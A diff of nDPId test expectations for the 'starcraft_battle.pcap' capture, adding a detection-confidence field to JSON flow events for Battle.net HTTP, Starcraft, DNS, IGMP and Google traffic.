 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1437389985930,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1437389985930,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLOlAAIAG2obAqAFkAuQucA3KAFB0cH\/azwiAz1AQAQBpNwAA"}
-00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":650,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985898,"flow_last_seen":1437389985931,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1437389985931,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3529,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/yf\/YF9PRCZXJVPZ1428591254317.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
-00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985898,"flow_last_seen":1437389985945,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1437389985945,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3530,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/0x\/0XQ1VXR8ZR271434128527471.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
+00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":650,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985898,"flow_last_seen":1437389985931,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1437389985931,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3529,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/yf\/YF9PRCZXJVPZ1428591254317.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
+00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985898,"flow_last_seen":1437389985945,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1437389985945,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3530,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/0x\/0XQ1VXR8ZR271434128527471.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":652,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1437389985955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1437389985955,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDcsAWb5HysuLTYASOQgfxgAAAgQFtAEBBAIBAwMF"}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":653,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1437389985955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1437389985955,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLOxAAIAG2oPAqAFkAuQucA3LAFDKy4tNAFm+SFAQAQCYngAA"}
-00813{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":654,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985892,"flow_last_seen":1437389985955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1437389985955,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3528,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_thumbnail\/4j\/4J7OUIISCLTQ1436943629210.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
-00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":655,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985923,"flow_last_seen":1437389985955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1437389985955,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3531,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/fa\/FA512IPUN0SE1436979936388.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
+00839{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":654,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985892,"flow_last_seen":1437389985955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1437389985955,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3528,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_thumbnail\/4j\/4J7OUIISCLTQ1436943629210.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
+00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":655,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985923,"flow_last_seen":1437389985955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1437389985955,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3531,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/fa\/FA512IPUN0SE1436979936388.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":657,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1437389985957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1437389985957,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDcy5z5mcpluU3oASOQil2AAAAgQFtAEBBAIBAwMF"}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":658,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1437389985957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1437389985957,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLO9AAIAG2oDAqAFkAuQucA3MAFCmW5Teuc+ZnVAQAQAesQAA"}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":675,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985960,"flow_last_seen":1437389985960,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1437389985960,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1437389985960,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1437389985960,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LPVAAIAG2m7AqAFkAuQucA3OAFAbejKQAAAAAIACIAD\/hwAAAgQFtAEDAwgBAQQC"}
-00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1437389985961,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3532,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/78\/78XH2UNU4JYK1434560551687.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
+00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1437389985961,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3532,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/78\/78XH2UNU4JYK1434560551687.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1437389985962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1437389985962,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDc1+R6dFIysb3oASOQjP5wAAAgQFtAEBBAIBAwMF"}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1437389985962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1437389985962,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLPpAAIAG2nXAqAFkAuQucA3NAFAjKxvefkenRlAQAQBIwAAA"}
-00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1437389985962,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3533,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/mf\/MFTH8TS42HKX1430183778319.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
-00608{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982769,"flow_last_seen":1437389982825,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":2,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"62.115.246.51","src_port":53146,"dst_port":1119,"l4_proto":"udp","ndpi": {"proto":"Starcraft","breed":"Fun","category":"Game"}}
+00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1437389985962,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3533,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/mf\/MFTH8TS42HKX1430183778319.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}}
+00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982769,"flow_last_seen":1437389982825,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":2,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"62.115.246.51","src_port":53146,"dst_port":1119,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Starcraft","breed":"Fun","category":"Game"}}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982769,"flow_last_seen":1437389982825,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":2,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"62.115.246.51","src_port":53146,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00612{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389961548,"flow_last_seen":1437389961598,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"64.233.184.188","src_port":2759,"dst_port":5228,"l4_proto":"tcp","ndpi": {"proto":"Google","breed":"Acceptable","category":"Web"}}
+00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389961548,"flow_last_seen":1437389961598,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"64.233.184.188","src_port":2759,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389961548,"flow_last_seen":1437389961598,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"64.233.184.188","src_port":2759,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389955932,"flow_last_seen":1437389955967,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"216.58.212.110","src_port":3052,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389955932,"flow_last_seen":1437389955967,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"216.58.212.110","src_port":3052,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389955932,"flow_last_seen":1437389955967,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"216.58.212.110","src_port":3052,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389981134,"flow_last_seen":1437389981218,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":53145,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00670{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1437389964518,"flow_last_seen":1437389964635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":777,"flow_avg_l4_payload_len":86,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3506,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"}}
-00617{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1437389976946,"flow_last_seen":1437389980126,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.107","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
-00615{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1437389958129,"flow_last_seen":1437389968685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":13,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.208.193","src_port":3427,"dst_port":1119,"l4_proto":"tcp","ndpi": {"proto":"Starcraft","breed":"Fun","category":"Game"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389981134,"flow_last_seen":1437389981218,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":53145,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1437389964518,"flow_last_seen":1437389964635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":777,"flow_avg_l4_payload_len":86,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3506,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"}}
+00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1437389976946,"flow_last_seen":1437389980126,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.107","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1437389958129,"flow_last_seen":1437389968685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":13,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.208.193","src_port":3427,"dst_port":1119,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Starcraft","breed":"Fun","category":"Game"}}
 00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1437389958129,"flow_last_seen":1437389968685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":13,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.208.193","src_port":3427,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389985821,"flow_last_seen":1437389985912,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":388,"flow_avg_l4_payload_len":97,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":55468,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00616{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389968488,"flow_last_seen":1437389968521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3484,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
